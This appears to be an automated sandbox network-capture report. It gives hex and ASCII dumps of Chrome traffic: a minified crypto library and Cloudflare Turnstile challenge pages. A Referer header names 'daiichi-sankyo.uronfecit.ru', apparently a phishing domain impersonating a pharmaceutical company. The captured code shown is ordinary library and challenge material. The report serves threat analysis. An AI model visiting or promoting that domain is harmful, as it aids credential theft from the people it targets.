                                        Data Ascii: 0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I
                                        2025-01-07 08:16:22 UTC1369INData Raw: 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79
                                        Data Ascii: fer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify
                                        2025-01-07 08:16:22 UTC1369INData Raw: 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e
                                        Data Ascii: .charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMN
                                        2025-01-07 08:16:22 UTC1369INData Raw: 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74
                                        Data Ascii: s(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=t
                                        2025-01-07 08:16:22 UTC1369INData Raw: 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35
                                        Data Ascii: 9]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        9192.168.2.449752104.18.95.414433696C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 08:16:22 UTC807OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/wonk3/0x4AAAAAAA2J__x0qrFVzzde/auto/fbE/normal/auto/ HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-platform: "Windows"
                                        Upgrade-Insecure-Requests: 1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: navigate
                                        Sec-Fetch-Dest: iframe
                                        Referer: https://daiichi-sankyo.uronfecit.ru/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 08:16:22 UTC1362INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 08:16:22 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 26636
                                        Connection: close
                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                        content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                        cross-origin-embedder-policy: require-corp
                                        cross-origin-opener-policy: same-origin
                                        cross-origin-resource-policy: cross-origin
                                        origin-agent-cluster: ?1
                                        accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                        critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                        referrer-policy: same-origin
                                        document-policy: js-profiling
                                        2025-01-07 08:16:22 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 65 32 38 31 35 66 35 66 39 61 34 33 64 39 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                        Data Ascii: Server: cloudflareCF-RAY: 8fe2815f5f9a43d9-EWRalt-svc: h3=":443"; ma=86400
                                        2025-01-07 08:16:22 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                        Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                        2025-01-07 08:16:22 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                        Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                        2025-01-07 08:16:22 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                        Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                        2025-01-07 08:16:22 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                        Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                        2025-01-07 08:16:22 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                        Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                        2025-01-07 08:16:22 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                        Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                        2025-01-07 08:16:22 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                        Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                        2025-01-07 08:16:22 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                        Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                        2025-01-07 08:16:22 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                        Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        10192.168.2.449751104.18.94.414433696C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 08:16:22 UTC383OUTGET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 08:16:23 UTC471INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 08:16:22 GMT
                                        Content-Type: application/javascript; charset=UTF-8
                                        Content-Length: 47521
                                        Connection: close
                                        accept-ranges: bytes
                                        last-modified: Thu, 02 Jan 2025 13:52:36 GMT
                                        cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                        access-control-allow-origin: *
                                        cross-origin-resource-policy: cross-origin
                                        Server: cloudflare
                                        CF-RAY: 8fe2815f7c5e8cd7-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-07 08:16:23 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                        Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                        2025-01-07 08:16:23 UTC1369INData Raw: 74 28 65 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 6a 74 28 65 2c 72 29 7b 76 61 72 20 6e 3d 65 3d 3d 6e 75 6c 6c 3f 6e 75 6c 6c 3a 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 7c 7c 65 5b 22 40 40 69 74 65 72 61 74 6f 72 22 5d 3b 69 66 28 6e 21 3d 6e 75 6c 6c 29 7b 76 61 72 20 6f 3d 5b 5d 2c 63 3d 21 30 2c 75 3d 21 31 2c 67 2c 68 3b 74 72 79 7b 66 6f 72 28 6e 3d 6e 2e 63 61 6c 6c 28 65 29 3b 21 28 63 3d 28 67 3d 6e 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 6f 2e 70 75 73 68 28 67 2e 76 61 6c 75 65 29 2c 21 28 72 26 26 6f 2e 6c 65 6e 67 74 68 3d 3d 3d 72 29 29 3b 63 3d 21 30 29
                                        Data Ascii: t(e){if(Array.isArray(e))return e}function jt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0)
                                        2025-01-07 08:16:23 UTC1369INData Raw: 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 70 29 7b 69 66 28 6f 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 67 26 26 28 67 3d 30 2c 70 5b 30 5d 26 26 28 6e 3d 30 29 29 2c 6e 3b 29 74 72 79 7b 69 66 28 6f 3d 31 2c 63 26 26 28 75 3d 70 5b 30 5d 26 32 3f 63 2e 72 65 74 75 72 6e 3a 70 5b 30 5d 3f 63 2e 74 68 72 6f 77 7c 7c 28 28 75 3d 63 2e 72 65 74 75 72 6e 29 26 26 75 2e 63 61 6c 6c 28 63 29 2c 30 29 3a 63 2e 6e 65 78 74 29 26 26 21 28 75 3d 75 2e 63 61 6c 6c 28 63 2c 70 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 75 3b 73 77 69 74 63 68 28 63 3d 30 2c 75 26 26 28 70 3d 5b 70 5b 30 5d 26 32 2c 